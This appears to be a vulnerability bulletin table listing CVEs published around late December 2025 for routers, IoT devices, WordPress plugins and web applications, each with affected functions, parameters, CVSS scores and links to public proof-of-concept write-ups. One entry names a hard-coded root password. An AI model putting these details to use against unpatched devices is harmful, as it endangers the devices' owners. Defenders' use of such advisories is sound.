| D-Link--DWR-M920 | A security flaw has been discovered in D-Link DWR-M920 up to 1.1.50. Impacted is the function sub_42261C of the file /boafrm/formFilter. The manipulation of the argument ip6addr results in stack-based buffer overflow. The attack may be launched remotely. The exploit has been released to the public and may be exploited. | 2025-12-29 | 8.8 | CVE-2025-15190 | VDB-338575 | D-Link DWR-M920 formFilter sub_42261C stack-based overflow VDB-338575 | CTI Indicators (IOB, IOC, IOA) Submit #723553 | D-Link DWR-M920 V1.1.50 Buffer Overflow https://github.com/panda666-888/vuls/blob/main/d-link/dwr-m920/formFilter.md https://github.com/panda666-888/vuls/blob/main/d-link/dwr-m920/formFilter.md#poc https://www.dlink.com/ |
| D-Link--DWR-M920 | A vulnerability was detected in D-Link DWR-M920 up to 1.1.50. This affects the function sub_423848 of the file /boafrm/formParentControl. Performing manipulation of the argument submit-url results in buffer overflow. The attack is possible to be carried out remotely. The exploit is now public and may be used. | 2025-12-29 | 8.8 | CVE-2025-15193 | VDB-338578 | D-Link DWR-M920 formParentControl sub_423848 buffer overflow VDB-338578 | CTI Indicators (IOB, IOC, IOA) Submit #723556 | D-Link DWR-M920 V1.1.50 Buffer Overflow https://github.com/panda666-888/vuls/blob/main/d-link/dwr-m920/formParentControl.md https://github.com/panda666-888/vuls/blob/main/d-link/dwr-m920/formParentControl.md#poc https://www.dlink.com/ |
| Tenda--AC10U | A vulnerability was determined in Tenda AC10U 15.03.06.48/15.03.06.49. This affects the function formSetPPTPUserList of the file /goform/setPptpUserList of the component HTTP POST Request Handler. This manipulation of the argument list causes buffer overflow. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-30 | 8.8 | CVE-2025-15215 | VDB-338600 | Tenda AC10U HTTP POST Request setPptpUserList formSetPPTPUserList buffer overflow VDB-338600 | CTI Indicators (IOB, IOC, IOA) Submit #725365 | Tenda AC10U AC10U v1.0 Firmware V15.03.06.48、AC10U v1.0 Firmware V15.03.06.49 Buffer Overflow https://www.notion.so/Tenda-AC10U-setPptpUserList-2d753a41781f80e8ba6bc37ba6100343?pvs=73 https://www.tenda.com.cn/ |
| Tenda--AC23 | A vulnerability was identified in Tenda AC23 16.03.07.52. This impacts the function fromSetIpMacBind of the file /goform/SetIpMacBind. Such manipulation of the argument bindnum leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit is publicly available and might be used. | 2025-12-30 | 8.8 | CVE-2025-15216 | VDB-338601 | Tenda AC23 SetIpMacBind fromSetIpMacBind stack-based overflow VDB-338601 | CTI Indicators (IOB, IOC, IOA) Submit #725447 | Tenda AC23 AC23 V16.03.07.52 Buffer Overflow https://lavender-bicycle-a5a.notion.site/Tenda-AC23-SetIpMacBind-2d753a41781f8026a001f16e85226a21?source=copy_link https://www.tenda.com.cn/ |
| Tenda--AC23 | A security flaw has been discovered in Tenda AC23 16.03.07.52. Affected is the function formSetPPTPUserList of the component HTTP POST Request Handler. Performing manipulation of the argument list results in buffer overflow. The attack can be initiated remotely. | 2025-12-30 | 8.8 | CVE-2025-15217 | VDB-338602 | Tenda AC23 HTTP POST Request formSetPPTPUserList buffer overflow VDB-338602 | CTI Indicators (IOB, IOC, IOA) Submit #725448 | Tenda AC23 AC23 V16.03.07.52 Buffer Overflow https://lavender-bicycle-a5a.notion.site/Tenda-AC23-formSetPPTPUserList-2d753a41781f8091b772cf9e66a687f1?source=copy_link https://www.tenda.com.cn/ |
| Tenda--AC10U | A weakness has been identified in Tenda AC10U 15.03.06.48/15.03.06.49. Affected by this vulnerability is the function fromadvsetlanip of the file /goform/AdvSetLanip of the component POST Request Parameter Handler. Executing manipulation of the argument lanMask can lead to buffer overflow. The attack can be launched remotely. The exploit has been made available to the public and could be exploited. | 2025-12-30 | 8.8 | CVE-2025-15218 | VDB-338603 | Tenda AC10U POST Request Parameter AdvSetLanip fromadvsetlanip buffer overflow VDB-338603 | CTI Indicators (IOB, IOC, IOA) Submit #725461 | Tenda AC10U AC10U v1.0 Firmware V15.03.06.48、AC10U v1.0 Firmware V15.03.06.49 Buffer Overflow https://lavender-bicycle-a5a.notion.site/Tenda-AC10U-fromadvsetlanip-2d753a41781f800c86c8d388a38e8101?source=copy_link https://www.tenda.com.cn/ |
| Tenda--M3 | A vulnerability was found in Tenda M3 1.0.0.13(4903). Affected by this issue is the function formSetVlanPolicy of the file /goform/setVlanPolicyData. Performing manipulation of the argument qvlan_truck_port results in heap-based buffer overflow. Remote exploitation of the attack is possible. The exploit has been made public and could be used. | 2025-12-30 | 8.8 | CVE-2025-15230 | VDB-338626 | Tenda M3 setVlanPolicyData formSetVlanPolicy heap-based overflow VDB-338626 | CTI Indicators (IOB, IOC, IOA) Submit #725490 | Tenda M3 V1.0.0.13(4903) Heap-based Buffer Overflow https://github.com/dwBruijn/CVEs/blob/main/Tenda/setVlanPolicy.md https://www.tenda.com.cn/ |
| Tenda--M3 | A vulnerability was determined in Tenda M3 1.0.0.13(4903). This affects the function formSetRemoteVlanInfo of the file /goform/setVlanInfo. Executing manipulation of the argument ID/vlan/port can lead to stack-based buffer overflow. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-30 | 8.8 | CVE-2025-15231 | VDB-338627 | Tenda M3 setVlanInfo formSetRemoteVlanInfo stack-based overflow VDB-338627 | CTI Indicators (IOB, IOC, IOA) Submit #725493 | Tenda M3 V1.0.0.13(4903) Stack-based Buffer Overflow https://github.com/dwBruijn/CVEs/blob/main/Tenda/setRemoteVlanInfo.md https://www.tenda.com.cn/ |
| Tenda--M3 | A vulnerability was identified in Tenda M3 1.0.0.13(4903). This vulnerability affects the function formSetAdPushInfo of the file /goform/setAdPushInfo. The manipulation of the argument mac/terminal leads to stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. | 2025-12-30 | 8.8 | CVE-2025-15232 | VDB-338628 | Tenda M3 setAdPushInfo formSetAdPushInfo stack-based overflow VDB-338628 | CTI Indicators (IOB, IOC, IOA) Submit #725494 | Tenda M3 V1.0.0.13(4903) Stack-based Buffer Overflow https://github.com/dwBruijn/CVEs/blob/main/Tenda/setAdPushInfo.md https://www.tenda.com.cn/ |
| Tenda--M3 | A security flaw has been discovered in Tenda M3 1.0.0.13(4903). This issue affects the function formSetAdInfoDetails of the file /goform/setAdInfoDetail. The manipulation of the argument adName/smsPassword/smsAccount/weixinAccount/weixinName/smsSignature/adRedirectUrl/adCopyRight/smsContent/adItemUID results in heap-based buffer overflow. The attack may be performed from remote. The exploit has been released to the public and may be exploited. | 2025-12-30 | 8.8 | CVE-2025-15233 | VDB-338629 | Tenda M3 setAdInfoDetail formSetAdInfoDetails heap-based overflow VDB-338629 | CTI Indicators (IOB, IOC, IOA) Submit #725495 | Tenda M3 V1.0.0.13(4903) Heap-based Buffer Overflow https://github.com/dwBruijn/CVEs/blob/main/Tenda/setAdInfoDetail.md https://www.tenda.com.cn/ |
| Tenda--M3 | A weakness has been identified in Tenda M3 1.0.0.13(4903). Impacted is the function formSetRemoteInternetLanInfo of the file /goform/setInternetLanInfo. This manipulation of the argument portIp/portMask/portGateWay/portDns/portSecDns causes heap-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be exploited. | 2025-12-30 | 8.8 | CVE-2025-15234 | VDB-338630 | Tenda M3 setInternetLanInfo formSetRemoteInternetLanInfo heap-based overflow VDB-338630 | CTI Indicators (IOB, IOC, IOA) Submit #725496 | Tenda M3 V1.0.0.13(4903) Heap-based Buffer Overflow https://github.com/dwBruijn/CVEs/blob/main/Tenda/setRemoteInternetLanInfo.md https://www.tenda.com.cn/ |
| Tenda--M3 | A flaw has been found in Tenda M3 1.0.0.13(4903). The affected element is the function formSetRemoteDhcpForAp of the file /goform/setDhcpAP. This manipulation of the argument startip/endip/leasetime/gateway/dns1/dns2 causes stack-based buffer overflow. The attack can be initiated remotely. The exploit has been published and may be used. | 2025-12-30 | 8.8 | CVE-2025-15252 | VDB-338642 | Tenda M3 setDhcpAP formSetRemoteDhcpForAp stack-based overflow VDB-338642 | CTI Indicators (IOB, IOC, IOA) Submit #725497 | Tenda M3 V1.0.0.13(4903) Stack-based Buffer Overflow https://github.com/dwBruijn/CVEs/blob/main/Tenda/setRemoteDhcpForAp.md https://www.tenda.com.cn/ |
| Tenda--M3 | A vulnerability has been found in Tenda M3 1.0.0.13(4903). The impacted element is an unknown function of the file /goform/exeCommand. Such manipulation of the argument cmdinput leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-12-30 | 8.8 | CVE-2025-15253 | VDB-338643 | Tenda M3 exeCommand stack-based overflow VDB-338643 | CTI Indicators (IOB, IOC, IOA) Submit #725498 | Tenda M3 V1.0.0.13(4903) Stack-based Buffer Overflow https://github.com/dwBruijn/CVEs/blob/main/Tenda/execCommand.md https://www.tenda.com.cn/ |
| Tenda--AC20 | A vulnerability has been found in Tenda AC20 up to 16.03.08.12. The impacted element is the function sscanf of the file /goform/PowerSaveSet. The manipulation of the argument powerSavingEn/time/powerSaveDelay/ledCloseType leads to buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-12-30 | 8.8 | CVE-2025-15356 | VDB-338742 | Tenda AC20 PowerSaveSet sscanf buffer overflow VDB-338742 | CTI Indicators (IOB, IOC, IOA) Submit #726360 | Tenda Tenda AC20 V16.03.08.12 Buffer Overflow https://github.com/xyh4ck/iot_poc/tree/main/Tenda%20AC20_Buffer_Overflow https://github.com/xyh4ck/iot_poc/blob/main/Tenda%20AC20_Buffer_Overflow/Tenda%20AC20_Buffer_Overflow.md#poc https://www.tenda.com.cn/ |
| QNO Technology--VPN Firewall | VPN Firewall developed by QNO Technology has a Insufficient Entropy vulnerability, allowing unauthenticated remote attackers to obtain any logged-in user session through brute-force attacks and subsequently log into the system. | 2025-12-31 | 8.8 | CVE-2025-15387 | https://www.twcert.org.tw/tw/cp-132-10613-e1780-1.html https://www.twcert.org.tw/en/cp-139-10614-dee41-2.html |
| QNO Technology--VPN Firewall | VPN Firewall developed by QNO Technology has an OS Command Injection vulnerability, allowing authenticated remote attackers to inject arbitrary OS commands and execute them on the server. | 2025-12-31 | 8.8 | CVE-2025-15388 | https://www.twcert.org.tw/tw/cp-132-10613-e1780-1.html https://www.twcert.org.tw/en/cp-139-10614-dee41-2.html |
| QNO Technology--VPN Firewall | VPN Firewall developed by QNO Technology has an OS Command Injection vulnerability, allowing authenticated remote attackers to inject arbitrary OS commands and execute them on the server. | 2025-12-31 | 8.8 | CVE-2025-15389 | https://www.twcert.org.tw/tw/cp-132-10613-e1780-1.html https://www.twcert.org.tw/en/cp-139-10614-dee41-2.html |
| UTT-- 512W | A weakness has been identified in UTT 进取 512W 1.7.7-171114. Affected is the function strcpy of the file /goform/formRemoteControl. This manipulation of the argument Profile causes buffer overflow. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-02 | 8.8 | CVE-2025-15428 | VDB-339350 | UTT 进取 512W formRemoteControl strcpy buffer overflow VDB-339350 | CTI Indicators (IOB, IOC, IOA) Submit #721875 | UTT 进取 512W v3v1.7.7-171114 Buffer Overflow https://github.com/Lena-lyy/cve/blob/main/1223/18.md https://github.com/Lena-lyy/cve/blob/main/1223/18.md#poc |
| UTT-- 512W | A security vulnerability has been detected in UTT 进取 512W 1.7.7-171114. Affected by this vulnerability is the function strcpy of the file /goform/formConfigCliForEngineerOnly. Such manipulation of the argument addCommand leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-02 | 8.8 | CVE-2025-15429 | VDB-339351 | UTT 进取 512W formConfigCliForEngineerOnly strcpy buffer overflow VDB-339351 | CTI Indicators (IOB, IOC, IOA) Submit #721876 | UTT 进取 512W v3v1.7.7-171114 Buffer Overflow https://github.com/Lena-lyy/cve/blob/main/1223/19.md https://github.com/Lena-lyy/cve/blob/main/1223/19.md#poc |
| UTT-- 512W | A vulnerability was detected in UTT 进取 512W 1.7.7-171114. Affected by this issue is the function strcpy of the file /goform/formFtpServerShareDirSelcet. Performing manipulation of the argument oldfilename results in buffer overflow. The attack can be initiated remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-02 | 8.8 | CVE-2025-15430 | VDB-339352 | UTT 进取 512W formFtpServerShareDirSelcet strcpy buffer overflow VDB-339352 | CTI Indicators (IOB, IOC, IOA) Submit #721888 | UTT 进取 512W v3v1.7.7-171114 Buffer Overflow https://github.com/GUOTINGTING2297/cve/blob/main/1234/20.md https://github.com/GUOTINGTING2297/cve/blob/main/1234/20.md#poc |
| UTT-- 512W | A flaw has been found in UTT 进取 512W 1.7.7-171114. This affects the function strcpy of the file /goform/formFtpServerDirConfig. Executing manipulation of the argument filename can lead to buffer overflow. The attack can be launched remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-02 | 8.8 | CVE-2025-15431 | VDB-339353 | UTT 进取 512W formFtpServerDirConfig strcpy buffer overflow VDB-339353 | CTI Indicators (IOB, IOC, IOA) Submit #721889 | UTT 进取 512W v3v1.7.7-171114 Buffer Overflow https://github.com/GUOTINGTING2297/cve/blob/main/1234/21.md https://github.com/GUOTINGTING2297/cve/blob/main/1234/21.md#poc |
| Codedraft--Mediabay - WordPress Media Library Folders | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Codedraft Mediabay - WordPress Media Library Folders allows Blind SQL Injection.This issue affects Mediabay - WordPress Media Library Folders: from n/a through 1.4. | 2025-12-31 | 8.5 | CVE-2025-28949 | https://vdp.patchstack.com/database/wordpress/plugin/mediabay/vulnerability/wordpress-mediabay-wordpress-media-library-folders-1-4-sql-injection-vulnerability?_s_id=cve |
| AA-Team--Amazon Affiliates Addon for WPBakery Page Builder (formerly Visual Composer) | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in AA-Team Amazon Affiliates Addon for WPBakery Page Builder (formerly Visual Composer) allows SQL Injection.This issue affects Amazon Affiliates Addon for WPBakery Page Builder (formerly Visual Composer): from n/a through 1.2. | 2025-12-31 | 8.5 | CVE-2025-30628 | https://vdp.patchstack.com/database/wordpress/plugin/azon-addon-js-composer/vulnerability/wordpress-amazon-affiliates-addon-for-wpbakery-page-builder-formerly-visual-composer-1-2-sql-injection-vulnerability?_s_id=cve |
| Priority--Web | CWE-434 Unrestricted Upload of File with Dangerous Type | 2025-12-29 | 8.8 | CVE-2025-55061 | https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0 |
| Plex--Media Server | Plex Media Server (PMS) through 1.42.2.10156 allows retrieval of a permanent access token via a /myplex/account call with a transient access token. | 2026-01-02 | 8.5 | CVE-2025-69414 | https://github.com/lufinkey/vulnerability-research/blob/main/CVE-2025-34158/README.md |
| Selea--Selea CarPlateServer (CPS) | Selea CarPlateServer 4.0.1.6 contains a remote program execution vulnerability that allows attackers to execute arbitrary Windows binaries by manipulating the NO_LIST_EXE_PATH configuration parameter. Attackers can bypass authentication through the /cps/ endpoint and modify server configuration, including changing admin passwords and executing system commands. | 2025-12-31 | 7.5 | CVE-2020-36904 | ExploitDB-49452 Vendor Homepage Zero Science Lab Disclosure (ZSL-2021-5622) VulnCheck Advisory: Selea CarPlateServer 4.0.1.6 Remote Program Execution via Configuration Endpoint |
| Nucom--NuCom 11N Wireless Router | NuCom 11N Wireless Router 5.07.90 contains a privilege escalation vulnerability that allows non-privileged users to access administrative credentials through the configuration backup endpoint. Attackers can send a crafted HTTP GET request to the backup configuration page with a specific cookie to retrieve and decode the admin password in Base64 format. | 2025-12-31 | 7.5 | CVE-2021-47726 | ExploitDB-49634 NuCom Vendor Homepage Zero Science Lab Disclosure (ZSL-2021-5629) VulnCheck Advisory: NuCom 11N Wireless Router 5.07.90 Privilege Escalation via Configuration Backup |
| KZ Broadband Technologies, Ltd.--JT3500V | KZTech JT3500V 4G LTE CPE 2.0.1 contains a session management vulnerability that allows attackers to reuse old session credentials without proper expiration. Attackers can exploit the weak session handling to maintain unauthorized access and potentially compromise device authentication mechanisms. | 2025-12-31 | 7.5 | CVE-2021-47740 | Zero Science Lab Disclosure (ZSL-2021-5646) Packet Storm Security Exploit Entry IBM X-Force Vulnerability Exchange Entry KZ TECH Vendor Homepage JATON TEC Homepage Neotel Vendor Homepage VulnCheck Advisory: KZTech JT3500V 4G LTE CPE 2.0.1 Insufficient Session Expiration Vulnerability |
| Zblchina--ZBL EPON ONU Broadband Router | ZBL EPON ONU Broadband Router V100R001 contains a privilege escalation vulnerability that allows limited administrative users to elevate access by sending requests to configuration endpoints. Attackers can exploit the vulnerability by accessing the configuration backup or password page to disclose the super user password and gain additional privileged functionalities. | 2025-12-31 | 7.5 | CVE-2021-47741 | ExploitDB-49737 ZBL China Vendor Homepage Archived W&D Thailand Vendor Homepage Zero Science Lab Disclosure (ZSL-2021-5647) VulnCheck Advisory: ZBL EPON ONU Broadband Router V100R001 Privilege Escalation via Configuration Endpoint |
| Cypress--ONE | Cypress Solutions CTM-200/CTM-ONE 1.3.6 contains hard-coded credentials vulnerability in Linux distribution that exposes root access. Attackers can exploit the static 'Chameleon' password to gain remote root access via Telnet or SSH on affected devices. | 2025-12-31 | 7.5 | CVE-2021-47744 | ExploitDB-50407 Cypress Solutions Official Homepage Zero Science Lab Disclosure (ZSL-2021-5686) VulnCheck Advisory: Cypress Solutions CTM-200/CTM-ONE 1.3.6 Hard-coded Credentials Remote Root |
| SOUND4 Ltd.--Impact/Pulse/First | SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below contain an insufficient session expiration vulnerability that allows attackers to reuse old session credentials. Attackers can exploit weak session management to potentially hijack active user sessions and gain unauthorized access to the application. | 2025-12-30 | 7.5 | CVE-2022-50692 | Zero Science Lab Disclosure (ZSL-2022-5724) Packet Storm Security Exploit Entry CXSecurity Vulnerability Listing IBM X-Force Vulnerability Exchange SOUND4 Product Homepage VulnCheck Advisory: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Insufficient Session Expiration Vulnerability |
| SOUND4 Ltd.--Impact/Pulse/First | SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x contains an unauthenticated stored cross-site scripting vulnerability in the username parameter that allows attackers to inject malicious scripts. Attackers can exploit the unvalidated username input to execute arbitrary HTML and JavaScript code in victim browser sessions without authentication. | 2025-12-30 | 7.2 | CVE-2022-50787 | Zero Science Lab Disclosure (ZSL-2022-5731) Packet Storm Security Exploit Details IBM X-Force Vulnerability Exchange Entry SOUND4 Product Homepage VulnCheck Advisory: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Unauthenticated Stored Cross-Site Scripting |
| SOUND4 Ltd.--Impact/Pulse/First | SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x contains an information disclosure vulnerability that allows unauthenticated attackers to access sensitive log files. Attackers can directly browse the /log directory to retrieve system and sensitive information without authentication. | 2025-12-30 | 7.5 | CVE-2022-50788 | Zero Science Lab Disclosure (ZSL-2022-5732) Packet Storm Security Exploit Details IBM X-Force Vulnerability Exchange Entry SOUND4 Product Homepage VulnCheck Advisory: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Information Disclosure via Log Directory |
| SOUND4 Ltd.--Impact/Pulse/First | SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x contains an unauthenticated remote code execution vulnerability in the firmware upload functionality with path traversal flaw. Attackers can exploit the upload.cgi script to write malicious files to the system with www-data permissions, enabling unauthorized access and code execution. | 2025-12-30 | 7.5 | CVE-2022-50796 | Zero Science Lab Disclosure (ZSL-2022-5741) Packet Storm Security Exploit Details IBM X-Force Vulnerability Exchange Entry SOUND4 Product Homepage VulnCheck Advisory: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Unauthenticated Remote Code Execution via upload.cgi |
| Chris Bagwell--SoX | SoX 14.4.2 contains a division by zero vulnerability when handling WAV files that can cause program crashes. Attackers can trigger a floating point exception by providing a specially crafted WAV file that causes arithmetic errors during sound file processing. | 2025-12-30 | 7.5 | CVE-2022-50798 | ExploitDB-51034 SoX Official SourceForge Page SoX Wikipedia Entry Zero Science Lab Disclosure (ZSL-2022-5712) VulnCheck Advisory: SoX 14.4.2 Denial of Service Vulnerability via WAV File Processing |
| Fetch Softworks--Fetch Softworks Fetch FTP Client | Fetch FTP Client 5.8.2 contains a denial of service vulnerability that allows attackers to trigger 100% CPU consumption by sending long server responses. Attackers can send specially crafted FTP server responses exceeding 2K bytes to cause excessive resource utilization and potentially crash the application. | 2025-12-30 | 7.5 | CVE-2022-50799 | ExploitDB-50696 Fetch Softworks Product Homepage Zero Science Lab Disclosure (ZSL-2022-5696) VulnCheck Advisory: Fetch Softworks Fetch FTP Client 5.8.2 Remote CPU Consumption Denial of Service |
| Hangzhou H3C Technologies--H3C SSL VPN | H3C SSL VPN contains a user enumeration vulnerability that allows attackers to identify valid usernames through the 'txtUsrName' POST parameter. Attackers can submit different usernames to the login_submit.cgi endpoint and analyze response messages to distinguish between existing and non-existing accounts. | 2025-12-30 | 7.5 | CVE-2022-50800 | ExploitDB-50742 H3C Official Product Homepage Zero Science Lab Disclosure (ZSL-2022-5697) VulnCheck Advisory: H3C SSL VPN n/a Username Enumeration via Login Script Credential Verification |
| Ateme--Anevia Flamingo XL/XS | Anevia Flamingo XL/XS 3.6.20 contains a critical vulnerability with weak default administrative credentials that can be easily guessed. Attackers can leverage these hard-coded credentials to gain full remote system control without complex authentication mechanisms. | 2025-12-30 | 7.5 | CVE-2023-53983 | Zero Science Lab Disclosure (ZSL-2023-5777) Packet Storm Security Exploit Details IBM X-Force Vulnerability Exchange Entry CXSecurity Vulnerability Listing Ateme Vendor Homepage VulnCheck Advisory: Anevia Flamingo XL/XS 3.6.20 Default Credentials Authentication Bypass |
| Tinycontrol--LAN Controller | Tinycontrol LAN Controller 1.58a contains an authentication bypass vulnerability that allows unauthenticated attackers to change admin passwords through a crafted API request. Attackers can exploit the /stm.cgi endpoint with a specially crafted authentication parameter to disable access controls and modify administrative credentials. | 2025-12-30 | 7.5 | CVE-2023-54327 | ExploitDB-51732 Tinycontrol Official Product Homepage Zero Science Lab Disclosure (ZSL-2023-5787) VulnCheck Advisory: Tinycontrol LAN Controller 1.58a Authentication Bypass via Admin Password Change |
| The Akuvox Company--Akuvox Smart Doorphone | Akuvox Smart Intercom S539 contains an improper access control vulnerability that allows users with 'User' privileges to modify API access settings and configurations. Attackers can exploit this vulnerability to escalate privileges and gain unauthorized access to administrative functionalities. | 2025-12-30 | 7.5 | CVE-2024-58337 | Zero Science Lab Disclosure (ZSL-2024-5862) Packet Storm Security Exploit Entry CXSecurity Vulnerability Listing VulnCheck Advisory: Akuvox Smart Intercom S539 Improper Access Control via ServicesHTTPAPI |
| monetizemore--Advanced Ads Ad Manager & AdSense | The Advanced Ads plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 2.0.14 via the 'change-ad__content' shortcode parameter. This allows authenticated attackers with editor-level permissions or above, to execute code on the server. | 2025-12-29 | 7.2 | CVE-2025-13592 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f9e83561-aa71-4984-8a26-207e208d70e8?source=cve https://plugins.trac.wordpress.org/browser/advanced-ads/tags/2.0.14/includes/ads/class-ad-plain.php#L36 https://plugins.trac.wordpress.org/changeset/3427297/advanced-ads#file9 |
| villatheme--Lucky Wheel for WooCommerce Spin a Sale | The Lucky Wheel for WooCommerce - Spin a Sale plugin for WordPress is vulnerable to PHP Code Injection in all versions up to, and including, 1.1.13. This is due to the plugin using eval() to execute user-supplied input from the 'Conditional Tags' setting without proper validation or sanitization. This makes it possible for authenticated attackers, with Administrator-level access and above, to execute arbitrary PHP code on the server. In WordPress multisite installations, this allows Site Administrators to execute arbitrary code, a capability they should not have since plugin/theme file editing is disabled for non-Super Admins in multisite environments. | 2025-12-30 | 7.2 | CVE-2025-14509 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9a41bc0e-0ab9-4cee-b3ca-d730c828782c?source=cve https://plugins.trac.wordpress.org/browser/woo-lucky-wheel/trunk/frontend/frontend.php#L127 https://plugins.trac.wordpress.org/browser/woo-lucky-wheel/tags/1.1.13/frontend/frontend.php#L127 https://plugins.trac.wordpress.org/changeset/3428063/ |
| Innorix--Innorix WP | Unrestricted Upload of File with Dangerous Type vulnerability in Innorix Innorix WP allows Upload a Web Shell to a Web Server.This issue affects Innorix WP from All versions If the "exam" directory exists under the directory where the product is installed (ex: innorix/exam) | 2025-12-29 | 7.7 | CVE-2025-15067 | https://www.innorix.com/ https://www.gnit.co.kr/software/innorix_product.html |
| Gmission--Web Fax | Missing Authorization vulnerability in Gmission Web Fax allows Privilege Abuse, Session Credential Falsification through Manipulation.This issue affects Web Fax: from 3.0 before 4.0. | 2025-12-29 | 7.7 | CVE-2025-15068 | https://www.gmission.co.kr/fax1 |
| Gmission--Web Fax | Improper Authentication vulnerability in Gmission Web Fax allows Privilege Escalation.This issue affects Web Fax: from 3.0 before 4.0. | 2025-12-29 | 7.1 | CVE-2025-15069 | https://www.gmission.co.kr/fax1 |
| Ksenia Security S.p.A.--Ksenia Security Lares 4.0 Home Automation | Ksenia Security Lares 4.0 Home Automation version 1.6 contains a default credentials vulnerability that allows unauthorized attackers to gain administrative access. Attackers can exploit the weak default administrative credentials to obtain full control of the home automation system. | 2025-12-30 | 7.5 | CVE-2025-15111 | Zero Science Lab Disclosure (ZSL-2025-5927) Packet Storm Security Exploit Entry Ksenia Security Vendor Homepage VulnCheck Advisory: Ksenia Security Lares 4.0 Home Automation 1.6 Default Credentials Vulnerability |
| Ksenia Security S.p.A.--Ksenia Security Lares 4.0 Home Automation | Ksenia Security Lares 4.0 Home Automation version 1.6 contains an unprotected endpoint vulnerability that allows authenticated attackers to upload MPFS File System binary images. Attackers can exploit this vulnerability to overwrite flash program memory and potentially execute arbitrary code on the home automation system's web server. | 2025-12-30 | 7.8 | CVE-2025-15113 | Zero Science Lab Disclosure (ZSL-2025-5930) Ksenia Security Vendor Homepage Packet Storm Security Exploit VulnCheck Advisory: Ksenia Security Lares 4.0 Home Automation 1.6 Remote Code Execution via MPFS Upload |
| Tenda--WH450 | A vulnerability was identified in Tenda WH450 1.0.0.18. Affected by this issue is some unknown functionality of the file /goform/SafeEmailFilter. The manipulation of the argument page leads to stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. | 2025-12-29 | 7.2 | CVE-2025-15163 | VDB-338538 | Tenda WH450 SafeEmailFilter stack-based overflow VDB-338538 | CTI Indicators (IOB, IOC, IOA) Submit #721214 | Tenda WH450 V1.0.0.18 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/SafeEmailFilter/SafeEmailFilter.md https://www.tenda.com.cn/ |
| Tenda--WH450 | A security flaw has been discovered in Tenda WH450 1.0.0.18. This affects an unknown part of the file /goform/SafeMacFilter. The manipulation of the argument page results in stack-based buffer overflow. The attack may be performed from remote. The exploit has been released to the public and may be exploited. | 2025-12-29 | 7.2 | CVE-2025-15164 | VDB-338539 | Tenda WH450 SafeMacFilter stack-based overflow VDB-338539 | CTI Indicators (IOB, IOC, IOA) Submit #721215 | Tenda WH450 V1.0.0.18 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/SafeMacFilter/SafeMacFilter.md https://www.tenda.com.cn/ |
| itsourcecode--Online Cake Ordering System | A vulnerability has been found in itsourcecode Online Cake Ordering System 1.0. The impacted element is an unknown function of the file /updatecustomer.php?action=edit. The manipulation of the argument ID leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-12-29 | 7.3 | CVE-2025-15165 | VDB-338544 | itsourcecode Online Cake Ordering System updatecustomer.php sql injection VDB-338544 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721106 | itsourcecode Online Cake Ordering System V1.0 SQL Injection https://github.com/LaneyYu/cve/issues/4 https://itsourcecode.com/ |
| itsourcecode--Online Cake Ordering System | A vulnerability was found in itsourcecode Online Cake Ordering System 1.0. This affects an unknown function of the file /updatesupplier.php?action=edit. The manipulation of the argument ID results in sql injection. The attack may be launched remotely. The exploit has been made public and could be used. | 2025-12-29 | 7.3 | CVE-2025-15166 | VDB-338545 | itsourcecode Online Cake Ordering System updatesupplier.php sql injection VDB-338545 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721108 | itsourcecode Online Cake Ordering System V1.0 SQL Injection https://github.com/LaneyYu/cve/issues/5 https://itsourcecode.com/ |
| itsourcecode--Online Cake Ordering System | A vulnerability was determined in itsourcecode Online Cake Ordering System 1.0. This impacts an unknown function of the file /detailtransac.php. This manipulation of the argument ID causes sql injection. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. | 2025-12-29 | 7.3 | CVE-2025-15167 | VDB-338546 | itsourcecode Online Cake Ordering System detailtransac.php sql injection VDB-338546 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721109 | itsourcecode Online Cake Ordering System V1.0 SQL Injection https://github.com/LaneyYu/cve/issues/6 https://itsourcecode.com/ |
| itsourcecode--Student Management System | A vulnerability was identified in itsourcecode Student Management System 1.0. Affected is an unknown function of the file /statistical.php. Such manipulation of the argument ID leads to sql injection. The attack can be executed remotely. The exploit is publicly available and might be used. | 2025-12-29 | 7.3 | CVE-2025-15168 | VDB-338547 | itsourcecode Student Management System statistical.php sql injection VDB-338547 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721155 | itsourcecode Student Management System V1.0 SQL Injection https://github.com/Susen2/cve/issues/1 https://itsourcecode.com/ |
